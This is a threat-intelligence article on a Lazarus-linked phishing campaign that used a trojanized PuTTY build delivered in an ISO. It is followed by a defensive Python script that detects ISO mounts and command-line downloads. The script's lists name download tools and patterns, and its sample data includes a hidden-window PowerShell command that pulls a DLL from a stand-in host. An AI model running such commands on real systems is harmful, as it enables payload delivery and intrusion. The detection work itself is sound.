North Korea-linked threat actors, including the Lazarus Group, have been observed using a novel spear-phishing method built on trojanized versions of the PuTTY SSH and Telnet client. Researchers at Mandiant observed an attack that began with a fake job lure sent by email, after which the attacker delivered a fake "job assessment" as an ISO file over WhatsApp. The ISO contained an IP address to connect to, logon credentials, and an altered build of the PuTTY application. When run, this PuTTY build loaded a dropper called DAVESHELL, which in turn deployed a variant of the AIRDRY backdoor previously used by North Korean actors. This AIRDRY variant downloaded plugins and executed them in memory to carry out post-compromise activity, instead of the command-based approach seen in earlier variants of the backdoor.
As with most threats, the entry point in this attack was phishing. This underlines the need for user training, enforced email policies, and correctly configured email scanning that flags inbound messages carrying suspicious attachments or URLs. The attack also reflects the growing use of ISO files for initial access among threat actors. To counter this, monitor for suspicious ISO mounts in the environment. In addition, monitor file downloads initiated from PowerShell or the command line, which would likely have detected DAVESHELL in this case.
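The two monitoring recommendations above, ISO mounts and downloads driven from PowerShell or the command line, can be expressed as simple detection rules over endpoint telemetry. The following is an added example written for this page; it is not code from Mandiant or from the original article. It runs over a handful of constructed events shaped like Sysmon process-create (Event ID 1) and file-create (Event ID 11) records plus a Microsoft-Windows-VHDMP/Operational image-surfaced record (Event ID 1); the field names (`Image`, `TargetFilename`, `CommandLine`, `VhdFilePath`), the list of download-capable binaries and the download command-line patterns are assumptions of the example and should be tuned to your own log schema and environment. The hostnames, paths and URL in the sample events are constructed.

```python
"""Toy detection pass for two guidance items: ISO drops/mounts and
command-line or PowerShell driven file downloads.

Events are plain dicts shaped loosely like Sysmon (EventID 1 = process
create, EventID 11 = file create) and the VHDMP operational log
(EventID 1 = virtual disk surfaced). The field names are an assumption
of this example, not a guaranteed schema.
"""
import re
from dataclasses import dataclass
from typing import Iterable

# Binaries commonly used to pull files down from the network.
# Assumption for this example; extend or narrow for your estate.
DOWNLOAD_CAPABLE = {
    "powershell.exe", "pwsh.exe", "cmd.exe",
    "certutil.exe", "bitsadmin.exe", "curl.exe",
}

# Command-line fragments that indicate a download is being performed.
DOWNLOAD_PATTERNS = re.compile(
    r"(invoke-webrequest|\biwr\b|invoke-restmethod|downloadfile|downloadstring|"
    r"start-bitstransfer|bitsadmin.*/transfer|certutil.*-urlcache|"
    r"\bcurl\s|\bwget\s|https?://)",
    re.IGNORECASE,
)

SYSMON = "Microsoft-Windows-Sysmon/Operational"
VHDMP = "Microsoft-Windows-VHDMP/Operational"


@dataclass
class Alert:
    rule: str
    host: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name component of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: Iterable[dict]) -> list[Alert]:
    """Apply three rules to a stream of events and return the alerts raised."""
    alerts: list[Alert] = []
    for ev in events:
        channel, eid = ev.get("Channel"), ev.get("EventID")
        host = ev.get("Computer", "?")

        if channel == SYSMON and eid == 11:
            # Rule 1: an .iso written somewhere under a user profile, which is
            # where mail, browser and chat clients save attachments.
            target = ev.get("TargetFilename", "")
            if target.lower().endswith(".iso") and "\\users\\" in target.lower():
                writer = basename(ev.get("Image", ""))
                alerts.append(Alert("iso_file_dropped", host, f"{writer} wrote {target}"))

        elif channel == VHDMP and eid == 1:
            # Rule 2: a disk image was mounted; only ISO images are of interest here.
            path = ev.get("VhdFilePath", "")
            if path.lower().endswith(".iso"):
                alerts.append(Alert("iso_mounted", host, f"mounted {path}"))

        elif channel == SYSMON and eid == 1:
            # Rule 3: a download-capable binary launched with a download-looking
            # command line. Benign admin use of powershell.exe is not flagged.
            image = basename(ev.get("Image", ""))
            cmd = ev.get("CommandLine", "")
            if image in DOWNLOAD_CAPABLE and DOWNLOAD_PATTERNS.search(cmd):
                alerts.append(Alert("cli_download", host, f"{image}: {cmd}"))
    return alerts


# Constructed sample telemetry: three events that should alert on host ws01,
# followed by two benign events on ws02 that should not.
SAMPLE_EVENTS = [
    {"Channel": SYSMON, "EventID": 11, "Computer": "ws01",
     "Image": r"C:\Program Files\WhatsApp\WhatsApp.exe",
     "TargetFilename": r"C:\Users\alice\Downloads\Job_Assessment.iso"},
    {"Channel": VHDMP, "EventID": 1, "Computer": "ws01",
     "VhdFilePath": r"C:\Users\alice\Downloads\Job_Assessment.iso"},
    {"Channel": SYSMON, "EventID": 1, "Computer": "ws01",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -nop -w hidden -c "Invoke-WebRequest '
                    'http://example.invalid/p -OutFile $env:TEMP\\p.dll"'},
    {"Channel": SYSMON, "EventID": 1, "Computer": "ws02",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Service -Name Spooler"},
    {"Channel": SYSMON, "EventID": 11, "Computer": "ws02",
     "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"D:\isos\ubuntu-22.04.iso"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.host}: {a.detail}")
```

The three rules are deliberately independent so that each can be turned into a SIEM query on its own; correlating an `iso_mounted` alert with a later `cli_download` on the same host within a short window is the higher-fidelity signal, and the `Alert.host` field is there to make that join easy.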